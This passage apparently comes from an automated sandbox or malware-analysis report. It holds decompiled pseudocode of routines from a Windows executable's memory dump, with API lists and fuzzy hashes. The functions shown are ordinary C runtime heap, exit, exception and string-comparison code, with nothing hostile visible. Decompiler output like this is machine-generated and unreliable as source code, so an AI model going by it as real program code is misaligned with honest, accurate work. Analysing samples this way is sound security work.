        							} while (_t30 >= 0);
        						}
        					}
        					E00401F48(0x40e080, 0x40e088);
        				}
        				_t6 = E00401F48(0x40e08c, 0x40e094);
        				if(_t14 == 0) {
        					 *0x40efec = _t21; // executed
        					ExitProcess(_a4); // executed
        				}
        				return _t6;
        			}

        APIs
        • GetCurrentProcess.KERNEL32(?,?,00401E9A,?,00000000,00000000,00401CD8,00000000,00000000), ref: 00401EBF
        • TerminateProcess.KERNEL32(00000000,?,00401E9A,?,00000000,00000000,00401CD8,00000000,00000000), ref: 00401EC6
        • ExitProcess.KERNEL32 ref: 00401F40
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: Process$CurrentExitTerminate
        • String ID:
        • API String ID: 1703294689-0
        • Opcode ID: 96b6eb2b1ada3912cfdbef8f216ed4b214f40aabd0245aad77861e2d736101e7
        • Instruction ID: 106b3c1fb8dc7d4a6030e4ee656a70930e9b6a9562d91e5636a1f2199f02e1d3
        • Opcode Fuzzy Hash: 96b6eb2b1ada3912cfdbef8f216ed4b214f40aabd0245aad77861e2d736101e7
        • Instruction Fuzzy Hash: C3019632644302EBD621DB56FE84A5ABBA5AB50354B10443BF541732F0C778A841CB1D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00402AE5(intOrPtr _a4) {
        				void* _t6;
        				void* _t9;
        
        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
        				 *0x410920 = _t6;
        				if(_t6 == 0) {
        					L3:
        					return 0;
        				} else {
        					if(E00402E9B() != 0) {
        						_t9 = 1;
        						return _t9;
        					} else {
        						HeapDestroy( *0x410920);
        						goto L3;
        					}
        				}
        			}

        APIs
        • HeapCreate.KERNELBASE(00000000,00001000,00000000,00401C60,00000000), ref: 00402AF6
          • Part of subcall function 00402E9B: HeapAlloc.KERNEL32(00000000,00000140,00402B0A), ref: 00402EA8
        • HeapDestroy.KERNEL32 ref: 00402B14
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: Heap$AllocCreateDestroy
        • String ID:
        • API String ID: 2236781399-0
        • Opcode ID: ce039d4533960772965c2512881cf9052a29947fc4a10e7b1a5aa3380fb64f68
        • Instruction ID: 36968e9bad6e006537344261cfbe536220768472456b3eebf4594cea4699108f
        • Opcode Fuzzy Hash: ce039d4533960772965c2512881cf9052a29947fc4a10e7b1a5aa3380fb64f68
        • Instruction Fuzzy Hash: 11E01271361301DAEB105F70AE4DB6637E9AB84786F408436B904F41F6E7F49480E508
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 37%
        			E00402326(void* __esi, void* __eflags, signed int _a4, struct _EXCEPTION_POINTERS* _a8) {
        				signed int _t16;
        				long _t17;
        				void* _t20;
        				void* _t22;
        				signed int _t23;
        				struct _EXCEPTION_POINTERS* _t25;
        				intOrPtr _t27;
        				signed int _t29;
        				intOrPtr _t32;
        				void* _t33;
        				void* _t34;
        				intOrPtr _t36;
        				signed int* _t39;
        
        				_t16 = E00402467(_a4);
        				if(_t16 == 0) {
        					L27:
        					_t17 = UnhandledExceptionFilter(_a8); // executed
        					return _t17;
        				}
        				_t23 =  *(_t16 + 8);
        				if(_t23 == 0) {
        					goto L27;
        				}
        				if(_t23 == 5) {
        					 *(_t16 + 8) =  *(_t16 + 8) & 0x00000000;
        					_t22 = 1;
        					return _t22;
        				}
        				if(_t23 == 1) {
        					L26:
        					return _t16 | 0xffffffff;
        				} else {
        					_t25 =  *0x40f00c; // 0x0
        					_a4 = _t25;
        					 *0x40f00c = _a8;
        					_t27 =  *((intOrPtr*)(_t16 + 4));
        					if(_t27 != 8) {
        						 *(_t16 + 8) =  *(_t16 + 8) & 0x00000000;
        						 *_t23(_t27);
        						L25:
        						_t16 = _a4;
        						 *0x40f00c = _t16;
        						goto L26;
        					}
        					_t29 =  *0x40e278; // 0x3
        					_t32 =  *0x40e27c; // 0x7
        					_t33 = _t32 + _t29;
        					if(_t29 >= _t33) {
        						L9:
        						_t20 =  *_t16;
        						_t36 =  *0x40e284; // 0x8c
        						if(_t20 != 0xc000008e) {
        							if(_t20 != 0xc0000090) {
        								if(_t20 != 0xc0000091) {
        									if(_t20 != 0xc0000093) {
        										if(_t20 != 0xc000008d) {
        											if(_t20 != 0xc000008f) {
        												if(_t20 == 0xc0000092) {
        													 *0x40e284 = 0x8a;
        												}
        											} else {
        												 *0x40e284 = 0x86;
        											}
        										} else {
        											 *0x40e284 = 0x82;
        										}
        									} else {
        										 *0x40e284 = 0x85;
        									}
        								} else {
        									 *0x40e284 = 0x84;
        								}
        							} else {
        								 *0x40e284 = 0x81;
        							}
        						} else {
        							 *0x40e284 = 0x83;
        						}
        						 *_t23(8,  *0x40e284);
        						 *0x40e284 = _t36;
        						goto L25;
        					} else {
        						_t34 = _t33 - _t29;
        						_t39 = 0x40e208 + (_t29 + _t29 * 2) * 4;
        						do {
        							 *_t39 =  *_t39 & 0x00000000;
        							_t39 =  &(_t39[3]);
        							_t34 = _t34 - 1;
        						} while (_t34 != 0);
        						goto L9;
        					}
        				}
        			}

        APIs
        • UnhandledExceptionFilter.KERNELBASE(?,?,?,00401CE9,?,?,00000000,00000000), ref: 0040245E
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: 631f368e3a2bdf23b7bd096ab490d91b50ea6a7e5ac9330eb19f01fab016ea42
        • Instruction ID: 3e34c503cc9e1e44cf6145bcfce5c596b79a5f3aed20832c40bce8563d7cadb9
        • Opcode Fuzzy Hash: 631f368e3a2bdf23b7bd096ab490d91b50ea6a7e5ac9330eb19f01fab016ea42
        • Instruction Fuzzy Hash: 6B316E315062128FEB249F21EF8872A3754F704329F21857BDC59B72E1C7BC98969B0E
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 40%
        			E00401FC9(intOrPtr _a4) {
        				void* _t2;
        				void* _t3;
        				intOrPtr _t5;
        				void* _t8;
        
        				_t5 = _a4;
        				_t8 = _t5 -  *0x40e338; // 0x3f8
        				if(_t8 > 0) {
        					L2:
        					if(_t5 == 0) {
        						_t5 = 1;
        					}
        					_t2 = RtlAllocateHeap( *0x410920, 0, _t5 + 0x0000000f & 0xfffffff0); // executed
        					return _t2;
        				}
        				_push(_t5); // executed
        				_t3 = E0040322F(); // executed
        				if(_t3 == 0) {
        					goto L2;
        				}
        				return _t3;
        			}

        APIs
        • RtlAllocateHeap.NTDLL(00000000,?,00000000,00401FAD,000000E0,00401F9A,?,0040294B,00000100,?,00000000), ref: 00401FF7
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: d6adfcae63bb6029b72f618421e7ece9aa1e65c4fe6ff6d657454537ec1941c4
        • Instruction ID: d4a647af104930c4a41195a184d7a24c05b0180898ab37aad0a25130da19d603
        • Opcode Fuzzy Hash: d6adfcae63bb6029b72f618421e7ece9aa1e65c4fe6ff6d657454537ec1941c4
        • Instruction Fuzzy Hash: 4DE0C23385A132A7EA206755BD80BCB2B549F10760F060137FC447B2F1C3742C8141CC
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004035E9(void* __ecx, intOrPtr _a4) {
        				intOrPtr _v8;
        				signed int _t45;
        				intOrPtr _t48;
        				signed int _t49;
        				intOrPtr _t51;
        				intOrPtr _t52;
        				intOrPtr _t53;
        				signed int _t54;
        				intOrPtr* _t55;
        				signed int _t57;
        				intOrPtr _t60;
        				intOrPtr _t61;
        				intOrPtr _t62;
        				void* _t69;
        				void* _t70;
        				void* _t77;
        				signed int _t78;
        				intOrPtr _t81;
        
        				_t60 = _a4;
        				_t81 =  *((intOrPtr*)(_t60 + 0x10));
        				_t45 =  *(_t60 + 8);
        				_t57 = 0;
        				while(_t45 >= 0) {
        					_t45 = _t45 << 1;
        					_t57 = _t57 + 1;
        				}
        				_t69 = 0x3f;
        				_t48 = _t57 * 0x204 + _t81 + 0x144;
        				_v8 = _t48;
        				do {
        					 *((intOrPtr*)(_t48 + 8)) = _t48;
        					 *((intOrPtr*)(_t48 + 4)) = _t48;
        					_t48 = _t48 + 8;
        					_t69 = _t69 - 1;
        				} while (_t69 != 0);
        				_t77 = (_t57 << 0xf) +  *((intOrPtr*)(_t60 + 0xc));
        				_t49 = VirtualAlloc(_t77, 0x8000, 0x1000, 4); // executed
        				if(_t49 != 0) {
        					_t70 = _t77 + 0x7000;
        					if(_t77 <= _t70) {
        						_t55 = _t77 + 0x10;
        						do {
        							 *(_t55 - 8) =  *(_t55 - 8) | 0xffffffff;
        							 *(_t55 + 0xfec) =  *(_t55 + 0xfec) | 0xffffffff;
        							 *((intOrPtr*)(_t55 - 4)) = 0xff0;
        							 *_t55 = _t55 + 0xffc;
        							 *((intOrPtr*)(_t55 + 4)) = _t55 - 0x1004;
        							 *((intOrPtr*)(_t55 + 0xfe8)) = 0xff0;
        							_t55 = _t55 + 0x1000;
        						} while (_t55 - 0x10 <= _t70);
        					}
        					_t61 = _t77 + 0xc;
        					_t51 = _v8 + 0x1f8;
        					_t78 = 1;
        					 *((intOrPtr*)(_t51 + 4)) = _t61;
        					 *((intOrPtr*)(_t61 + 8)) = _t51;
        					_t62 = _t70 + 0xc;
        					 *((intOrPtr*)(_t51 + 8)) = _t62;
        					 *((intOrPtr*)(_t62 + 4)) = _t51;
        					 *(_t81 + 0x44 + _t57 * 4) =  *(_t81 + 0x44 + _t57 * 4) & 0x00000000;
        					 *(_t81 + 0xc4 + _t57 * 4) = _t78;
        					_t52 =  *((intOrPtr*)(_t81 + 0x43));
        					_t53 = _a4;
        					 *((char*)(_t81 + 0x43)) = _t52 + 1;
        					if(_t52 == 0) {
        						 *(_t53 + 4) =  *(_t53 + 4) | _t78;
        					}
        					 *(_t53 + 8) =  *(_t53 + 8) &  !(0x80000000 >> _t57);
        					_t54 = _t57;
        				} else {
        					_t54 = _t49 | 0xffffffff;
        				}
        				return _t54;
        			}

        APIs
        • VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,?,00000000,000000E0,?,?,0040330F,000000E0,?,?,?,00000100), ref: 0040363A
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: b8818b59d44ee81dd74aa90f1f753e2e903c2f809bb2161564c4d1ba6d8ca7d2
        • Instruction ID: b194c8cc373f437d19731aad16077d0e282b73b6c322f3e770f7fca132dc6843
        • Opcode Fuzzy Hash: b8818b59d44ee81dd74aa90f1f753e2e903c2f809bb2161564c4d1ba6d8ca7d2
        • Instruction Fuzzy Hash: BC31BC316006029FD324CF18C884BA5BBE4FB50368F24C6BEE1598B3E2D775EA06CB40
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        C-Code - Quality: 100%
        			E004036E4(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
        				signed int _v8;
        				signed char _v12;
        				intOrPtr _v16;
        				intOrPtr _t186;
        				void* _t187;
        				signed int _t188;
        				signed int* _t189;
        				intOrPtr _t191;
        				signed int* _t192;
        				signed int* _t193;
        				signed char _t194;
        				intOrPtr _t195;
        				intOrPtr* _t196;
        				signed int _t199;
        				signed int _t202;
        				signed int _t207;
        				signed int _t209;
        				signed int _t218;
        				signed int _t221;
        				signed int* _t222;
        				signed int _t227;
        				intOrPtr _t228;
        				intOrPtr _t229;
        				intOrPtr _t230;
        				char _t233;
        				signed int _t234;
        				signed char _t235;
        				signed int* _t237;
        				signed int* _t239;
        				signed int* _t244;
        				signed int* _t245;
        				signed char _t250;
        				intOrPtr _t256;
        				signed int _t257;
        				char _t258;
        				char _t259;
        				signed char _t260;
        				signed int* _t262;
        				signed int* _t267;
        				signed int* _t268;
        				char* _t270;
        				signed int _t274;
        				unsigned int _t275;
        				intOrPtr _t277;
        				unsigned int _t278;
        				intOrPtr* _t280;
        				void* _t281;
        				signed char _t290;
        				signed int _t292;
        				signed char _t295;
        				signed int _t298;
        				signed int _t302;
        				signed int* _t304;
        
        				_t222 = _a4;
        				_t280 = _a8;
        				_t186 =  *((intOrPtr*)(_t222 + 0x10));
        				_t292 = _a12 + 0x00000017 & 0xfffffff0;
        				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
        				_v16 = _t274 * 0x204 + _t186 + 0x144;
        				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
        				_a12 = _t227;
        				_t194 =  *(_t227 + _t280 - 4);
        				_t281 = _t227 + _t280 - 4;
        				_v8 = _t194;
        				if(_t292 <= _t227) {
        					if(__eflags < 0) {
        						_t195 = _a8;
        						_a12 = _a12 - _t292;
        						_t228 = _t292 + 1;
        						 *((intOrPtr*)(_t195 - 4)) = _t228;
        						_t196 = _t195 + _t292 - 4;
        						_a8 = _t196;
        						_t295 = (_a12 >> 4) - 1;
        						 *((intOrPtr*)(_t196 - 4)) = _t228;
        						__eflags = _t295 - 0x3f;
        						if(_t295 > 0x3f) {
        							_t295 = 0x3f;
        						}
        						__eflags = _v8 & 0x00000001;
        						if((_v8 & 0x00000001) == 0) {
        							_t298 = (_v8 >> 4) - 1;
        							__eflags = _t298 - 0x3f;
        							if(_t298 > 0x3f) {
        								_t298 = 0x3f;
        							}
        							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
        							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
        								__eflags = _t298 - 0x20;
        								if(_t298 >= 0x20) {
        									_t128 = _t298 - 0x20; // -32
        									_t130 = _t186 + 4; // 0x4
        									_t244 = _t298 + _t130;
        									_t199 =  !(0x80000000 >> _t128);
        									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
        									 *_t244 =  *_t244 - 1;
        									__eflags =  *_t244;
        									if( *_t244 == 0) {
        										_t245 = _a4;
        										_t138 = _t245 + 4;
        										 *_t138 =  *(_t245 + 4) & _t199;
        										__eflags =  *_t138;
        									}
        								} else {
        									_t304 = _t298 + _t186 + 4;
        									_t202 =  !(0x80000000 >> _t298);
        									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
        									 *_t304 =  *_t304 - 1;
        									__eflags =  *_t304;
        									if( *_t304 == 0) {
        										 *_a4 =  *_a4 & _t202;
        									}
        								}
        								_t196 = _a8;
        							}
        							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
        							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
        							_t302 = _a12 + _v8;
        							_a12 = _t302;
        							_t295 = (_t302 >> 4) - 1;
        							__eflags = _t295 - 0x3f;
        							if(_t295 > 0x3f) {
        								_t295 = 0x3f;
        							}
        						}
        						_t229 = _v16;
        						_t230 = _t229 + _t295 * 8;
        						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
        						 *((intOrPtr*)(_t196 + 8)) = _t230;
        						 *((intOrPtr*)(_t230 + 4)) = _t196;
        						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
        						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
        						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
        							_t233 =  *(_t295 + _t186 + 4);
        							__eflags = _t295 - 0x20;
        							_a11 = _t233;
        							_t234 = _t233 + 1;
        							__eflags = _t234;
        							 *(_t295 + _t186 + 4) = _t234;
        							if(_t234 >= 0) {
        								__eflags = _a11;
        								if(_a11 == 0) {
        									_t237 = _a4;
        									_t176 = _t237 + 4;
        									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
        									__eflags =  *_t176;
        								}
        								_t189 = _t186 + 0xc4 + _t274 * 4;
        								_t235 = _t295 - 0x20;
        								_t275 = 0x80000000;
        							} else {
        								__eflags = _a11;
        								if(_a11 == 0) {
        									_t239 = _a4;
        									 *_t239 =  *_t239 | 0x80000000 >> _t295;
        									__eflags =  *_t239;
        								}
        								_t189 = _t186 + 0x44 + _t274 * 4;
        								_t275 = 0x80000000;
        								_t235 = _t295;
        							}
        							 *_t189 =  *_t189 | _t275 >> _t235;
        							__eflags =  *_t189;
        						}
        						_t188 = _a12;
        						 *_t196 = _t188;
        						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
        					}
        					L52:
        					_t187 = 1;
        					return _t187;
        				}
        				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
        					return 0;
        				} else {
        					_t250 = (_v8 >> 4) - 1;
        					_v12 = _t250;
        					if(_t250 > 0x3f) {
        						_t250 = 0x3f;
        						_v12 = _t250;
        					}
        					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
        						if(_t250 >= 0x20) {
        							_t267 = _v12 + _t186 + 4;
        							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
        							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
        							 *_t267 =  *_t267 - 1;
        							__eflags =  *_t267;
        							if( *_t267 == 0) {
        								_t268 = _a4;
        								_t44 = _t268 + 4;
        								 *_t44 =  *(_t268 + 4) & _t218;
        								__eflags =  *_t44;
        							}
        						} else {
        							_t270 = _v12 + _t186 + 4;
        							_t221 =  !(0x80000000 >> _t250);
        							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
        							 *_t270 =  *_t270 - 1;
        							if( *_t270 == 0) {
        								 *_a4 =  *_a4 & _t221;
        							}
        						}
        					}
        					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
        					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
        					_v8 = _v8 + _a12 - _t292;
        					if(_v8 <= 0) {
        						_t277 = _a8;
        					} else {
        						_t290 = (_v8 >> 4) - 1;
        						_t256 = _a8 + _t292 - 4;
        						if(_t290 > 0x3f) {
        							_t290 = 0x3f;
        						}
        						_t207 = _v16 + _t290 * 8;
        						_a12 = _t207;
        						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
        						_t209 = _a12;
        						 *(_t256 + 8) = _t209;
        						 *((intOrPtr*)(_t209 + 4)) = _t256;
        						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
        						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
        							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
        							_a15 = _t258;
        							_t259 = _t258 + 1;
        							 *((char*)(_t290 + _t186 + 4)) = _t259;
        							if(_t259 >= 0) {
        								__eflags = _a15;
        								if(_a15 == 0) {
        									_t84 = _t290 - 0x20; // -33
        									_t262 = _a4;
        									_t86 = _t262 + 4;
        									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
        									__eflags =  *_t86;
        								}
        								_t193 = _t186 + 0xc4 + _t274 * 4;
        								_t91 = _t290 - 0x20; // -33
        								_t260 = _t91;
        								_t278 = 0x80000000;
        							} else {
        								if(_a15 == 0) {
        									 *_a4 =  *_a4 | 0x80000000 >> _t290;
        								}
        								_t193 = _t186 + 0x44 + _t274 * 4;
        								_t278 = 0x80000000;
        								_t260 = _t290;
        							}
        							 *_t193 =  *_t193 | _t278 >> _t260;
        						}
        						_t277 = _a8;
        						_t257 = _v8;
        						_t192 = _t277 + _t292 - 4;
        						 *_t192 = _t257;
        						 *(_t257 + _t192 - 4) = _t257;
        					}
        					_t191 = _t292 + 1;
        					 *((intOrPtr*)(_t277 - 4)) = _t191;
        					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
        					goto L52;
        				}
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
        • Instruction ID: c295135d24096637811d9c2337524a1fe8b3cd46574432ef6835662b29470685
        • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
        • Instruction Fuzzy Hash: AEB19F7590020ADFDB15CF04C5D0AA9BBE5BF48319F14C1AED85A6B382C775EE46CB90
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 86%
        			E004054D8(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
        				signed int _v8;
        				intOrPtr _v20;
        				short* _v28;
        				int _v32;
        				int _v36;
        				short* _v40;
        				short* _v44;
        				char _v58;
        				struct _cpinfo _v64;
        				void* _v80;
        				int _t65;
        				int _t66;
        				int _t69;
        				intOrPtr* _t82;
        				intOrPtr* _t84;
        				int _t86;
        				int _t87;
        				int _t88;
        				void* _t96;
        				char _t99;
        				char _t101;
        				intOrPtr _t104;
        				intOrPtr _t105;
        				int _t107;
        				short* _t109;
        				int _t111;
        				int _t114;
        				intOrPtr _t115;
        				short* _t116;
        				int _t118;
        
        				_push(0xffffffff);
        				_push(0x40c510);
        				_push(E00402C1C);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t115;
        				_t116 = _t115 - 0x30;
        				_v28 = _t116;
        				_t118 =  *0x40f244; // 0x1
        				_t107 = 1;
        				if(_t118 != 0) {
        					L5:
        					_t111 = _a16;
        					if(_t111 > 0) {
        						_t88 = E00405175(_a12, _t111);
        						_pop(_t96);
        						_t111 = _t88;
        						_a16 = _t111;
        					}
        					if(_a24 > 0) {
        						_t87 = E00405175(_a20, _a24);
        						_pop(_t96);
        						_a24 = _t87;
        					}
        					_t65 =  *0x40f244; // 0x1
        					if(_t65 != 2) {
        						if(_t65 != _t107) {
        							goto L48;
        						} else {
        							if(_a28 == 0) {
        								_t86 =  *0x40f234; // 0x0
        								_a28 = _t86;
        							}
        							if(_t111 == 0 || _a24 == 0) {
        								if(_t111 != _a24) {
        									if(_a24 <= _t107) {
        										if(_t111 > _t107) {
        											L30:
        											_push(3);
        											goto L18;
        										} else {
        											if(GetCPInfo(_a28,  &_v64) == 0) {
        												goto L48;
        											} else {
        												if(_t111 <= 0) {
        													if(_a24 <= 0) {
        														goto L39;
        													} else {
        														if(_v64 >= 2) {
        															_t82 =  &_v58;
        															if(_v58 != 0) {
        																while(1) {
        																	_t104 =  *((intOrPtr*)(_t82 + 1));
        																	if(_t104 == 0) {
        																		goto L20;
        																	}
        																	_t99 =  *_a20;
        																	if(_t99 <  *_t82 || _t99 > _t104) {
        																		_t82 = _t82 + 2;
        																		if( *_t82 != 0) {
        																			continue;
        																		} else {
        																			goto L20;
        																		}
        																	} else {
        																		goto L17;
        																	}
        																	goto L49;
        																}
        															}
        														}
        														goto L20;
        													}
        												} else {
        													if(_v64 >= 2) {
        														_t84 =  &_v58;
        														if(_v58 != 0) {
        															while(1) {
        																_t105 =  *((intOrPtr*)(_t84 + 1));
        																if(_t105 == 0) {
        																	goto L30;
        																}
        																_t101 =  *_a12;
        																if(_t101 <  *_t84 || _t101 > _t105) {
        																	_t84 = _t84 + 2;
        																	if( *_t84 != 0) {
        																		continue;
        																	} else {
        																		goto L30;
        																	}
        																} else {
        																	goto L17;
        																}
        																goto L50;
        															}
        														}
        													}
        													goto L30;
        													L50:
        												}
        											}
        										}
        									} else {
        										L20:
        										_t66 = _t107;
        									}
        								} else {
        									L17:
        									_push(2);
        									L18:
        									_pop(_t66);
        								}
        							} else {
        								L39:
        								_t69 = MultiByteToWideChar(_a28, 9, _a12, _t111, 0, 0);
        								_v32 = _t69;
        								if(_t69 == 0) {
        									goto L48;
        								} else {
        									_v8 = 0;
        									E00405450(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
        									_v28 = _t116;
        									_v40 = _t116;
        									_v8 = _v8 | 0xffffffff;
        									if(_v40 == 0 || MultiByteToWideChar(_a28, _t107, _a12, _t111, _v40, _v32) == 0) {
        										goto L48;
        									} else {
        										_t114 = MultiByteToWideChar(_a28, 9, _a20, _a24, 0, 0);
        										_v36 = _t114;
        										if(_t114 == 0) {
        											goto L48;
        										} else {
        											_v8 = _t107;
        											E00405450(_t114 + _t114 + 0x00000003 & 0x000000fc, _t96);
        											_v28 = _t116;
        											_t109 = _t116;
        											_v44 = _t109;
        											_v8 = _v8 | 0xffffffff;
        											if(_t109 == 0 || MultiByteToWideChar(_a28, 1, _a20, _a24, _t109, _t114) == 0) {
        												goto L48;
        											} else {
        												_t66 = CompareStringW(_a4, _a8, _v40, _v32, _t109, _t114);
        											}
        										}
        									}
        								}
        							}
        						}
        					} else {
        						_t66 = CompareStringA(_a4, _a8, _a12, _t111, _a20, _a24);
        					}
        				} else {
        					if(CompareStringW(0, 0, 0x40c4e0, _t107, 0x40c4e0, _t107) == 0) {
        						if(CompareStringA(0, 0, 0x40c4dc, _t107, 0x40c4dc, _t107) == 0) {
        							L48:
        							_t66 = 0;
        						} else {
        							 *0x40f244 = 2;
        							goto L5;
        						}
        					} else {
        						 *0x40f244 = _t107;
        						goto L5;
        					}
        				}
        				L49:
        				 *[fs:0x0] = _v20;
        				return _t66;
        				goto L50;
        			}

        APIs
        • CompareStringW.KERNEL32(00000000,00000000,0040C4E0,00000001,0040C4E0,00000001,00000000,021E0DFC,y"@,00403D52,0040C49C,?,00401586,?,?), ref: 00405516
        • CompareStringA.KERNEL32(00000000,00000000,0040C4DC,00000001,0040C4DC,00000001,?,?,?,00403D23), ref: 00405533
        • CompareStringA.KERNEL32(?,00000000,00000000,00403D23,?,?,00000000,021E0DFC,y"@,00403D52,0040C49C,?,00401586,?,?), ref: 00405591
        • GetCPInfo.KERNEL32(?,00000000,00000000,021E0DFC,y"@,00403D52,0040C49C,?,00401586,?,?,?,00403D23), ref: 004055E2
        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,?,?,00403D23), ref: 00405661
        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,?,?,?,?,00403D23), ref: 004056C2
        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00403D23), ref: 004056D5
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00403D23), ref: 00405721
        • CompareStringW.KERNEL32(?,00000000,00000000,?,?,00000000,?,00000000,?,?,?,00403D23), ref: 00405739
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: ByteCharCompareMultiStringWide$Info
        • String ID: y"@
        • API String ID: 1651298574-1963953533
